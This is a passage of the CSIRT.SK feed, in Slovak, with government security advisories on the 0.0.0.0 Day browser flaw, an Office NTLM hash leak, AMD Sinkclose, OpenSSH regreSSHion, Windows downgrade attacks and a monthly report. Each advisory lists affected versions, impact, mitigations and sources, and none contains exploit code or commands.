<p><strong>Zdroje:</strong></p>



<p><a href="https://blog.1password.com/august-2024-security-update/">https://blog.1password.com/august-2024-security-update/</a></p>



<p><a href="https://support.1password.com/kb/202408a/">https://support.1password.com/kb/202408a/</a></p>



<p><a href="https://support.1password.com/kb/202408/">https://support.1password.com/kb/202408/</a></p>



<p><a href="https://www.helpnetsecurity.com/2024/08/09/cve-2024-42219-cve-2024-42218/">https://www.helpnetsecurity.com/2024/08/09/cve-2024-42219-cve-2024-42218/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1238/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – júl 2024</title>
		<link>/posts/1230</link>
					<comments>/posts/1230#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 13 Aug 2024 10:57:02 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=1230</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci júl 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci júl 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/08/MS202407.pdf" data-type="link" data-id="/wp-content/uploads/2024/08/MS202407.pdf">Mesačná správa – 07/2024 PDF (976 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1230/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>18 rokov stará zraniteľnosť „0.0.0.0“</title>
		<link>/posts/1226</link>
					<comments>/posts/1226#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 13 Aug 2024 10:45:24 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=1226</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/download.jpg" alt="" /></p>Výskumný tím spoločnosti Oligo Security poukázal na zraniteľnosť s názvom &#8220;0.0.0.0 Day&#8221;, ktorá ovplyvňuje webové prehliadače Google Chrome, Mozilla Firefox,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/download.jpg" alt="" /></p>
<p><strong>Výskumný tím spoločnosti Oligo Security poukázal na zraniteľnosť s názvom &#8220;0.0.0.0 Day&#8221;, ktorá ovplyvňuje webové prehliadače </strong><strong>Google Chrome, Mozilla Firefox, Apple Safari a&nbsp;prehliadače na báze Chromium. Zraniteľnosť umožňuje škodlivým webovým stránkam obchádzať zabezpečenie prehliadača a komunikovať so službami spustenými v lokálnej sieti. Útočníkovi umožňuje získanie neoprávneného prístupu k&nbsp;lokálnym službám a&nbsp;vzdialené vykonanie kódu. Zraniteľnosť je známa od roku 2006.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Webové prehliadače (Google Chrome/ Chromium, Mozilla Firefox, Apple Safari)</li>



<li>Operačné sytémy &#8211; MacOS, Linux</li>



<li>Aplikácie bežiace na localhost, vrátane Selenium Grid</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Zraniteľnosť umožňuje škodlivým webovým stránkam obchádzať zabezpečenie prehliadača a komunikovať so službami spustenými v lokálnej sieti organizácie. Útočníkovi umožňuje získanie neoprávneného prístupu k lokálnym službám a vzdialené vykonanie kódu. Chyba súvisí s nejednotnou implementáciou bezpečnostných mechanizmov CORS (Cross-Origin Resource Sharing) a&nbsp;PNA (Private Network Access) v prehliadačoch a s nedostatočnou štandardizáciou ich fungovania pri spracovaní HTTP požiadavky zasielaných na „wildcard“ IP adresu 0.0.0.0. Táto špeciálna IP adresa na operačných systémoch macOS a&nbsp;Linux reprezentuje všetky lokálne IP adresy a&nbsp;sieťové rozhrania na zariadení.</strong></p>



<p><strong>Výsledkom je, že zdanlivo neškodná IP adresa 0.0.0.0 môže byť použitá ako nástroj na zneužitie lokálnych služieb vrátane služieb používaných na vývoj, operačných systémov a dokonca aj interných sietí.</strong><strong></strong></p>



<p>Bezpečnostní výskumníci zachytili aktívne zneužívanie zraniteľnosti v&nbsp;rámci nedávnych útokov <a href="https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild">ShadowRay</a> na AI platformy, <a href="https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps">SeleniumGreed</a> cielených na Selenium Grid alebo PyTorch inštancie. Ľubovoľná aplikácia, ktorá beží na localhoste a je prístupná cez 0.0.0.0, je pravdepodobne náchylná na vzdialené vykonávanie kódu.</p>



<p><strong>Pozn. Zraniteľnosť možno zneužiť len na zariadeniach s&nbsp;operačnými systémami macOS a&nbsp;Linux. Zraniteľnosť nemá vplyv na zariadenia so systémom Windows, nakoľko spoločnosť Microsoft blokuje adresu IP na úrovni operačného systému.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Obchádzanie bezpečnostných prvkov</li>



<li>Neoprávnený prístup</li>



<li>Vzdialené vykonanie kódu</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia webových prehliadačov na najnovšie verzie. Pokiaľ nemôžete aktualizovať na najnovšiu verziu, obmedzte prístup k službám bežiacim na localhost, ak sú prístupné cez IP adresu 0.0.0.0.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser">https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser</a></p>



<p><a href="https://thehackernews.com/2024/08/0000-day-18-year-old-browser.html">https://thehackernews.com/2024/08/0000-day-18-year-old-browser.html</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1226/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť MS Office a 365 umožňujúca získanie NTLM hashov</title>
		<link>/posts/1224</link>
					<comments>/posts/1224#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 13 Aug 2024 10:34:42 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<guid isPermaLink="false">/?p=1224</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft zverejnila informácie a&#160;odporúčania pre mitigáciu zraniteľnosti MS Office a MS 365 Apps, ktorú by vzdialený neautentifikovaný útočník mohol...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft zverejnila informácie a&nbsp;odporúčania pre mitigáciu zraniteľnosti MS Office a MS 365 Apps, ktorú by vzdialený neautentifikovaný útočník mohol zneužiť na exfiltráciu NTLM hashov používaných v&nbsp;rámci autentifikácie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Microsoft Office 2016</li>



<li>Microsoft Office 2019</li>



<li>Microsoft Office LTSC 2021</li>



<li>Microsoft 365 Apps</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-38200 </strong>(CVSS skóre 7.5)</p>



<p>Bližšie nešpecifikovanú zraniteľnosť by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeeciálne vytvoreného webového obsahu alebo súbora mohol zneužiť na získanie autentifikačných NTLM hashov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí kliknúť na URL odkaz alebo otvoriť špeciálne vytvorený súbor.</p>



<p>Pozn. zraniteľnosť odhalili bezpečnostní výskumníci zo spoločnosti PrivSec Consulting, ktorá bližšie detaily zverejnia v&nbsp;rámci konferencie DEFCON.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Microsoft prostredníctvom funkcionality Feature Flighting nasadila protiopatrenia na všetkých verziách Microsoft Office a&nbsp;Microsoft 365 s&nbsp;platnou podporou. Po vydaní bezpečnostných záplat v&nbsp;rámci augustového MS Patch Tuesday odporúča bezodkladnú aktualizáciu zasiahnutých produktov, ktorá bude obsahovať finálnu verziu protiopatrení.</p>



<p>Zneužitie zraniteľnosti je možné mitigovať aj:</p>



<ul>
<li>aktiváciou bezpečnostnej politiky pre blokovanie odchádzajúcej NTLM komunikácie na vzdialené servery, ktorú môžete nakonfigurovať podľa <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote-servers">návodu</a></li>



<li>pridaním používateľov do skupiny <a href="https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group">Protected Users Security Group</a>, ktorá zabraňuje využitiu NTML autentifikácie</li>



<li>blokovaním odchádzajúcej komunikácie TCP 445/SMB prostredníctvom sieťových alebo bezpečnostných prvkov</li>
</ul>



<p><strong>Zdroje:</strong></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38200">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38200</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/microsoft-discloses-unpatched-office-flaw-that-exposes-ntlm-hashes/">https://www.bleepingcomputer.com/news/security/microsoft-discloses-unpatched-office-flaw-that-exposes-ntlm-hashes/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1224/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť „Sinkclose“ v procesoroch AMD</title>
		<link>/posts/1221</link>
					<comments>/posts/1221#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 13 Aug 2024 10:33:44 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=1221</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/AMD-processor.png" alt="" /></p>Spoločnosť AMD varuje pred vysoko závažnou zraniteľnosťou procesora, známou ako „SinkClose“. Táto chyba ovplyvňuje všetky procesory AMD vyrobené od roku...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/AMD-processor.png" alt="" /></p>
<p><strong>Spoločnosť AMD varuje pred vysoko závažnou zraniteľnosťou procesora, známou ako „SinkClose“. Táto chyba ovplyvňuje všetky procesory AMD vyrobené od roku 2006 a umožňuje útočníkom zvyšovanie privilégií a&nbsp;ľubovoľné vykonávanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>EPYC 1. , 2. , 3.  a 4.generácia</li>



<li>EPYC Embedded 3000, 7002, 7003, and 9003, R1000, R2000, 5000, a 7000</li>



<li>Ryzen Embedded V1000, V2000, a V3000</li>



<li>Ryzen 3000, 5000, 4000, 7000, a 8000</li>



<li>Ryzen 3000 Mobile, 5000 Mobile, 4000 Mobile, a 7000 Mobile</li>



<li>Ryzen Threadripper 3000 a 7000</li>



<li>AMD Threadripper PRO (Castle Peak WS SP3, Chagall WS)</li>



<li>AMD Athlon 3000 Mobile (Dali, Pollock)</li>



<li>AMD Instinct MI300A<strong></strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-31315 </strong><strong>(CVSS skóre 7,5)</strong><strong></strong></p>



<p>C<strong>hyba „SinkClose“ umožňuje útočníkom s prístupom na úrovni jadra (Ring 0) upravovať nastavenia režimu správy systému (SMM), a to aj v prípade, že je aktivovaný zámok SMM. Táto zraniteľnosť môže byť zneužitá na vypnutie bezpečnostných funkcií a vloženie škodlivého kódu. Výskumníci Enrique Nissim a Krzysztof Okupski z bezpečnostnej spoločnosti IOActive objavili viacero spôsobov, ako túto zraniteľnosť úspešne zneužiť. Chyba sa nachádza v&nbsp;systéme System Management Random Access Memory (SMRAM) a&nbsp;umožňuje neopravený prístup k citlivým údajom, vrátane hesiel a osobných údajov. Pre úspešné zneužitie tejto zraniteľnosti je potrebné aby mal útočník prístup k&nbsp;jadru systému.</strong></p>



<p>Čipy AMD využívajú ochranný mechanizmus nazývaný TSeg, ktorý po aktivácii premapováva pamäť a&nbsp;tým obmedzuje prístup operačných systémov k režimu správy systému (SMM). Útočníci môžu zraniteľnosťou zneužiť túto funkciu TSeg, čím získajú možnosť vykonávať ľubovoľný kód s oprávneniami na úrovni Ring -2, čo predstavuje bezpečnostné riziko.</p>



<p>&#8220;<strong><em>Pozn: &nbsp;&nbsp;Ring -2 predstavuje jednu z najvyšších úrovní oprávnení v počítačovej architektúre, nachádzajúcu sa pod úrovňou Ring -1, ktorá je používaná pre hypervízory a virtualizáciu CPU, a nad úrovňou Ring 0, ktorá je využívaná jadrom operačného systému. Táto úroveň oprávnení umožňuje prístup k veľmi nízkoúrovňovým systémovým funkciám a je tiež k dispozícii v režime správy systému (SMM).&#8221;</em></strong></p>



<p><strong><em>Ring 0 – Najvyššia úroveň oprávnení &#8211; Používa sa jadrom operačného systému. Má plný prístup k hardvéru a všetkým systémovým prostriedkom.</em></strong></p>



<p><strong><em>Ring 1 – Stredná úroveň oprávnení &#8211; určená pre menej privilegované časti operačného systému</em></strong></p>



<p><strong><em>Ring 2 – Nižšia úroveň oprávnení &#8211; určená pre menej kritické systémové úlohy alebo rozšírenia ako napr</em></strong><strong><em>íklad ovládače alebo systémové služby</em></strong><strong><em>.</em></strong></p>



<p><strong><em>Ring 3 – Najnižšia úroveň oprávnení &#8211; používa sa na bežné aplikácie a procesy v používateľskom priestore.</em></strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Neoprávnený prístup k&nbsp;citlivým informáciám</strong></li>



<li><strong></strong><strong>Zvyšovanie privilégií</strong></li>



<li><strong></strong><strong>Obchádzanie bezpečnostných prvkov</strong></li>



<li><strong></strong><strong>Ľubovoľné vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Aktualizáciu systému BIOS špecifickú pre váš produkt si vyžiadajte od svojho výrobcu OEM. Viac informácií nájdete </strong><a href="https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html#cve"><strong>tu</strong></a><strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html">https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/new-amd-sinkclose-flaw-helps-install-nearly-undetectable-malware/">https://www.bleepingcomputer.com/news/security/new-amd-sinkclose-flaw-helps-install-nearly-undetectable-malware/</a></p>



<p><a href="https://www.techpowerup.com/325488/sinkclose-vulnerability-affects-every-amd-cpu-dating-back-to-2006">https://www.techpowerup.com/325488/sinkclose-vulnerability-affects-every-amd-cpu-dating-back-to-2006</a></p>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1221/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická bezpečnostná zraniteľnosť v OpenSSH</title>
		<link>/posts/1060</link>
					<comments>/posts/1060#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 13 Aug 2024 06:50:21 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Unauthorized access]]></category>
		<guid isPermaLink="false">/?p=1060</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/signal-2022-02-09-114137_002.png" alt="" /></p>Vývojári nástroja OpenSSH vydali bezpečnostnú aktualizáciu, ktorá opravuje kritickú bezpečnostnú zraniteľnosť. Zraniteľnosť možno zneužiť na vzdialené vykonanie kódu a získanie úplnej...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/signal-2022-02-09-114137_002.png" alt="" /></p>
<p><strong>Vývojári nástroja OpenSSH vydali bezpečnostnú aktualizáciu, ktorá opravuje kritickú bezpečnostnú zraniteľnosť. Zraniteľnosť možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad zraniteľným systémom.</strong></p>



<p>AKTUALIZACIA <br><strong><em>Aktualizácia k 13.08.2024: Vývojári operačného systému FreeBSD vydali bezpečnostné aktualizácie, ktoré opravujú ďalší variant tejto zraniteľnosti s označením CVE-2024-7589, ktorý možno taktiež zneužiť na vzdialené vykonanie škodlivého kódu.</em></strong></p>



<p><em><strong>Aktualizácia k&nbsp;15.07.2024: CVE-2024-6387 je v&nbsp;súčasnosti aktíve zneužívaná útočníkmi. Bezpečnostní výskumníci počas jej detailnej analýzy odhalili aj jej menej závažný variant s&nbsp;označením CVE-2024-6409, ktorý taktiež možno zneužiť na vykonanie kódu</strong>.</em></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>CVE-2024-7589</p>



<ul>
<li>OpenSSH modul na operačných systémoch FreeBSD vo verzii staršej ako 14.1-STABLE, 14.1-RELEASE-p3, 14.0-RELEASE-p9, 13.3-STABLE, 13.3-RELEASE-p5</li>
</ul>



<p>CVE-2024-6387</p>



<ul>
<li>OpenSSH vo verzii od 8.5p1 po 9.7p1 (vrátane)</li>



<li>OpenSSH vo verzii staršej ako 4.4p1 bez aplikovaných záplat pre zraniteľnosti CVE-2006-5051 a CVE-2008-4109</li>
</ul>



<p><em>Pozn. Zraniteľnosť je možné preukázateľne zneužiť na operačných systémoch LINUX na báze knižnice glibc. Operačné systémy OpenBSD nie sú zasiahnuté.</em></p>



<p>CVE-2024-6409<p class="MsoNoSpacing" style="margin-left:36.0pt;text-indent:-18.0pt;mso-list:
l0 level1 lfo1"><span style="font-family:Symbol;
mso-fareast-font-family:Symbol;mso-bidi-font-family:Symbol;mso-fareast-language:
SK"><span style="mso-list:Ignore">·<span style="font:7.0pt &quot;Times New Roman&quot;">         </span></span></span><span style="mso-fareast-language:SK">OpenSSH vo verziách 8.7p1 a 8.8p1</span></p><em>Pozn. Uvedené verzie sú súčasťou balíkov operačného systému Rad Hat Enterprise Linux 9</em>.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-7589</strong> (CVSS skóre 8.1)<br>Zraniteľnosť za špecifických podmienok vedie k vzniku súbehu pri spracovávaní signálov v rámci handlera signálov v procese sshd(8), ktorý možno prostredníctvom<strong> zaslania špeciálne vytvorených požiadaviek zneužiť na vzdialené vykonanie škodlivého kódu s oprávneniami používateľa root</strong> a získanie úplnej kontroly nad systémom. Jedná sa o ďalší variant zraniteľnosti CVE-2024-6387.</p>



<p><strong>CVE-2024-6387 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť za špecifických podmienok vedie k vzniku&nbsp;<strong>súbehu</strong> pri spracovávaní signálov v&nbsp;rámci <strong>handlera SIGALRM procesu sshd</strong>. Vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorených požiadaviek mohol zneužiť na <strong>vzdialené vykonanie škodlivého kódu</strong> s&nbsp;<strong>oprávneniami používateľa root</strong>. Úspešným zneužitím CVE-2024-6387 možno získať úplnú kontrolu nad systémom. Na zraniteľnosť je dostupný proof-of-concept kód demonštrujúci návod na jej zneužitie a&nbsp;<strong>v súčasnosti je aktívne zneužívaná</strong>. Zraniteľnosť dostala názov „regreSSHion“.</p>



<p><strong>CVE-2024-6409</strong> (CVSS skóre 7,0)</p>



<p>Zraniteľnosť za špecifických podmienok vedie k <strong>vzniku súbehu</strong> pri spracovávaní signálov v rámci handlera SIGALRM procesu <strong>privsep</strong>. Vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorených požiadaviek mohol zneužiť na <strong>vzdialené vykonanie škodlivého kódu</strong>. Zraniteľnosť bezpečnostní výskumníci odhalili počas dodatočnej analýzy kritickej zraniteľnosti CVE-2024-6387.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p class="has-text-align-left"><strong>Administrátorom a&nbsp;používateľom odporúčame bezodkladne aktualizovať OpenSSH na verziu 9.8p1 alebo novšiu. V&nbsp;prípade, že aktualizáciu nemožno vykonať, zraniteľnosť možno dočasne mitigovať úplným zákazom SSH prístupov prostredníctvom sieťových a&nbsp;bezpečnostných prvkov alebo nastavením premennej LoginGraceTime na hodnotu 0 v&nbsp;konfiguračnom súbore sshd. Zmena konfigurácie však zraniteľné systémy vystavuje riziku zneprístupnenia služby.</strong> </p>



<p><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin;color:black;mso-fareast-language:SK"><strong>Taktiež odporúčame preveriť prítomnosť indikátorov kompromitácie v&nbsp;rámci logov sieťových a&nbsp;bezpečnostných prvkov a&nbsp;ich blokovanie.</strong></span></p>



<p><strong>Indikátory kompromitácie (IOC):</strong></p>



<ul>
<li>108.174.58[.]28</li>
</ul>



<p><strong>Zdroje:</strong></p>



<p><a href="https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server">https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server</a></p>



<p><a href="https://www.openssh.com/releasenotes.html#9.8p1">https://www.openssh.com/releasenotes.html#9.8p1</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/new-regresshion-openssh-rce-bug-gives-root-on-linux-servers/">https://www.bleepingcomputer.com/news/security/new-regresshion-openssh-rce-bug-gives-root-on-linux-servers/</a></p>



<p><a href="https://thehackernews.com/2024/07/new-openssh-vulnerability-could-lead-to.html">https://thehackernews.com/2024/07/new-openssh-vulnerability-could-lead-to.html</a></p>



<p><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/296064">https://exchange.xforce.ibmcloud.com/vulnerabilities/296064</a></p>



<p><a href="https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html">https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html</a></p>



<p><a href="https://www.openwall.com/lists/oss-security/2024/07/08/2">https://www.openwall.com/lists/oss-security/2024/07/08/2</a></p>



<p><a href="https://access.redhat.com/errata/RHSA-2024:4457">https://access.redhat.com/errata/RHSA-2024:4457</a></p>



<p><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/350852">https://exchange.xforce.ibmcloud.com/vulnerabilities/350852</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7589">https://nvd.nist.gov/vuln/detail/CVE-2024-7589</a></p>



<p><a href="https://www.freebsd.org/security/advisories/FreeBSD-SA-24:08.openssh.asc">https://www.freebsd.org/security/advisories/FreeBSD-SA-24:08.openssh.asc</a></p>



<div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container"></div></div>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1060/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero day zraniteľnosti Windows vedú k downgrade systému</title>
		<link>/posts/1213</link>
					<comments>/posts/1213#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 08 Aug 2024 14:30:48 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">/?p=1213</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Bezpečnostný výskumník spoločnosti SafeBreach Alon Leviev na konferencii Black Hat 2024 odhalil dve zero-day zraniteľnosti. Vysoko závažné zraniteľnosti sa týkajú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Bezpečnostný výskumník spoločnosti SafeBreach Alon Leviev na konferencii Black Hat 2024 odhalil dve zero-day zraniteľnosti. Vysoko závažné zraniteľnosti sa týkajú zvyšovania privilégií v systéme Windows Backup (VBS) vrátane podmnožiny Azure Virtual Machine SKUS.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Windows 10</li>



<li>Windows 11</li>



<li>Windows Server</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Pri útokoch typu downgrade nútia aktéri hrozieb cieľové zariadenie vrátiť sa k starším/predošlým verziám softvéru, čím sa v ňom opätovne sprístupnia zraniteľnosti, ktoré môžu byť zneužité na kompromitáciu systému.<br><br>Bezpečnostný výskumník spoločnosti SafeBreach, Alon Leviev, zistil, že proces aktualizácie systému Windows môže byť kompromitovaný takým spôsobom, ktorým sa <strong>zníži verzia komponentov operačného systému</strong>, vrátane dynamických knižníc (DLL) a jadra NT. Napriek tomu, že tieto <strong>komponenty sú neaktualizované</strong>, systém Windows Update hlási, že <strong>operačný systém je plne aktualizovaný, a nástroje na obnovu a skenovanie nedokážu odhaliť žiadne problémy</strong>.<br><br><strong>CVE-2024-21302 (CVSS skóre 6,7) a CVE-2024-38202 (CVSS skóre 7,3)</strong><br>Vysoko závažné zraniteľnosti CVE-2024-21302 a CVE-2024-38202 sa <strong>nachádzajú v systéme Windows Backup</strong>, vrátane podmnožiny Azure Virtual Machine SKUS, <strong>a týkajú sa zvýšenia oprávnení</strong>. Chyba umožňuje útočníkovi so základnými používateľskými oprávneniami obchádzať niektoré funkcie Virtualization Based Security (VBS), čo môže viesť k zavedeniu predtým zmiernených zraniteľností a k infiltrácii údajov chránených VBS.<br><br><strong>Pre úspešné zneužitie zraniteľnosti CVE-2024-38202 je potrebná interakcia zo strany privilegovaného používateľa.</strong></p>



<p><strong>Závažnosť zraniteľnosti:</strong> Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Zvýšenie privilégií</li>



<li>Exfiltrácia údajov</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>V súčasnosti neexistuje opravná aktualizácia, preto Microsoft odporúča pre zníženie rizika zneužitia dodržať nasledujúce kroky, ktoré nájdete <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38202" data-type="link" data-id="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38202">tu</a>.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/08/windows-downgrade-attack-risks-exposing.html">https://thehackernews.com/2024/08/windows-downgrade-attack-risks-exposing.html</a><br><a href="https://www.bleepingcomputer.com/news/microsoft/windows-update-downgrade-attack-unpatches-fully-updated-systems/">https://www.bleepingcomputer.com/news/microsoft/windows-update-downgrade-attack-unpatches-fully-updated-systems/</a><br><a href="https://www.tenable.com/cve/CVE-2024-38202">https://www.tenable.com/cve/CVE-2024-38202</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21302">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21302</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38202">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38202</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1213/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v Roundcube umožňujú exfiltráciu citlivých údajov a rozposielanie e-mailov</title>
		<link>/posts/1210</link>
					<comments>/posts/1210#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 08 Aug 2024 14:07:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Roundcube]]></category>
		<guid isPermaLink="false">/?p=1210</guid>

